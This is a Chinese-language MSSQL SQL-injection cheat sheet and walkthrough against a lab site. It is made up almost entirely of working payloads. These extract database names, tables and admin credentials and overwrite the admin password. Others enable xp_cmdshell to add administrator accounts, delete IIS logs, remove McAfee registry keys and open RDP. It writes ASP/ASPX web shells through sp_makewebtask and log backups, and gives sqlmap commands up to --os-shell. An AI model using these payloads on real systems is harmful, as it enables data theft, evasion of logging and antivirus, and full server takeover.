接上面一篇
Microsoft推出的一种关系型数据库系统
其主要搭配如下:
1.判断是否有注入
'
"
and 1=1
and 1=2
/
-0
2.初步判断是否是SQLserver数据库(mssql)
and user>0
3.判断数据库系统
and (select count(*) from sysobjects)>0 mssql
and (select count(*) from msysobjects)>0 access
sysobjects表在MSSQL中不存在此表,但存在msysobjects表
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数表名
and (select Count(*) from [表名])>0
7.猜字段
and (select Count(字段名) from 表名)>0
8.猜字段中记录长度
and (select top 1 len(字段名) from 表名)>0
9.(1)猜字段的ascii值(access)
and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
(2)猜字段的ascii值(mssql)
and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
http://192.168.10.159:8005/?id=1
数据库版本
id=1 and 1=(select @@version)Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
当前使用的数据库
id=1 and 1=(select db_name())test
列数据库名称
//获取第1/2/3/4个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4)
and 1=(select top 1 name from master..sysdatabases where dbid>3)
and 1=(select top 1 name from master..sysdatabases where dbid>2)
and 1=(select top 1 name from master..sysdatabases where dbid>1)and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'wewe')
//xml报错获取全部用户数据库名
and 1=(select name from master..sysdatabases for xml path)
master
tempdb
model
msdb
test
列表名
//获取第一张表 newss
and 1=(select top 1 name from sysobjects where xtype='u')
//获取第二张表 admin
and 1=(select top 1 name from sysobjects where xtype='U' and name <> 'newss' )
//获取全部表
and 1=(select name from sysobjects where xtype='u' for xml path)newss
admin
获取表admin
的列名
//获取第一列列名 admin
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'admin'))
//获取第二列列名 pass
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'admin') and name <> 'admin' )
//获取所有列名
and 1=(select name from syscolumns where id =(select id from sysobjects where name = 'admin') for xml path )
获取 列amdin
与列pass
数据
//获取第一个用户名
and 1=(select top 1 admin from admin)
//获取第一个用户名对应的密码
and 1=(select top 1 pass from admin)
//获取所有信息
and 1=(select admin,pass from admin for xml path)cracer
admincracer
字段长度
order by 3
查版本和数据库名
//注意数据类型
union select null,(select name from master..sysdatabases for xml path),nullunion select @@version,db_name(),null
test | contest | id |
---|---|---|
mssql | tetesstesdfaf | 1 |
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) | test | 2 |
查其他数据库的表名还可以这样:
union select (select name from sysobjects where xtype='u' for xml path),null,null
列表名
union select (select name from sysobjects where xtype='u' for xml path),null,null
列列名
union select (select name from syscolumns where id =(select id from sysobjects where name = 'admin') for xml path ),null,null
列数据
union select (select admin,pass from admin for xml path),null,null
and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限
and 1=(select is_srvrolemember('public')) //判断是否为public权限
and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select HAS_DBACCESS('master')) //判断是否有库读取权限
过程 | 说明 |
---|---|
sp_addlogin | 创建新的SQL server登录,该登录运行用户使用SQL server身份验证连接到SQL server实例 |
sp_dropuser | 从当前数据库中删除数据库用户 |
xp_enumgroups | 提供Microsoft Windows本地组列表或在指定的Windows域中定义的全局组列表 |
xp_regwrite | 未被公布的存储过程,写入注册表 |
xp_regread | 读取注册表 |
xp_regdeletevalue | 删除注册表 |
xp_dirtree | 读取目录 |
sp_password | 更改密码 |
xp_servicecontrol | 停止或激活某服务 |
;update admin set pass='49ba59abbe56e057' where admin='cracer'将管理员表admin中cracer用户的密码设置为49ba59abbe56e057 123456
记得修改表中数据,防止原管理员登陆出错
修改之前把原来密码备份
通常在密码解不出的情况下选择使用该方法
修复上传
;EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
;exec sp_configure 'Web Assistant Procedures', 1; RECONFIGURE;exec sp_makewebtask 'C:\Inetpub\wwwroot\8005\666.asp','select''<%execute(request("cmd"))%>'''--
1.检测与恢复扩展存储
判断xp_cmdshell扩展存储是否存在
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell')
判断xp_regread扩展存储过程是否存在
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
恢复
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
;exec sp_dropextendedproc xp_cmdshell,'xplog70.dll'
新建用户
;exec master..xp_cmdshell 'net user test test /add'
;exec master..xp_cmdshell 'net localgroup administrators test /add'操控日志
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log '
Getshell
echo ^<%Execute(request("a"))%^> > d:\www\123.asp
;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx' ;--
操作注册表
删除注册表
reg delete HKLM\SOFTWARE\McAfee /f
导入注册表
Regedit /s d:\web\zh\hp.reg
导出注册表
regedit /e d:\web\zhao\aaa.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp"
添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活某个服务。 (需要SA权限)
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
启用存储过程
exec sp_addextendedproc xp_regread,'xpstar.dll'
;exec master.dbo.sp_addextendedproc0x780070005f007200650067007200650061006400,0x7800700073007400610072002e0064006c006c00—exec sp_addextendedproc xp_regwrite,'xpstar.dll'
;exec master..xp_cmdshell 'sc config termservice start=auto'
;exec master..xp_cmdshell 'net start termservice'
;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f'
//允许外部连接
;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x50 /f' //改端口到80
开启3389
;exec master..xp_cmdshell "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"--
1.判断数据库用户权限
and 1=(select is_member('db_owner'));--
2.搜索web目录
;create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID int NOT NULL IDENTITY(1,1));--
然后
;insert into temp(dir,depth,files)exec master.dbo.xp_dirtree 'c:',1,1--
and(select dir from temp where id=1)>0
由于不能一次性获取所有目录文件和文件夹名,因此需要更改ID的值,依次列出文件和文件夹
找到web目录后,就可以写入一句话木马了
;alter database ssdown5 set RECOVERY FULL
;create table test(str image)--
;backup log ssdown5 to disk='c:\test' with init--
;insert into test(str)values ('<%excute(request("cmd"))%>')--
;backup log ssdown5 to disk='c:\inetpub\wwwroot\x.asp'--
;alter database ssdown5 set RECOVERY simple
测试站点:
http://192.168.10.159:8005/?id=1
测试是否存在注入
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch
查询当前数据库名/用户名/是否为dba权限
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch --current-db
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch --current-user
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch --is-dba
查test数据库中表,admin表中字段,查admin,pass字段中数据
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch -D test --tables
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch -D test -T admin --columns
sqlmap -u "http://192.168.10.159:8005/?id=1" --batch -D test -T admin -C admin,pass --dump
os-shell模式
sqlmap -u "http://192.168.10.159:8005/?id=1" --os-shell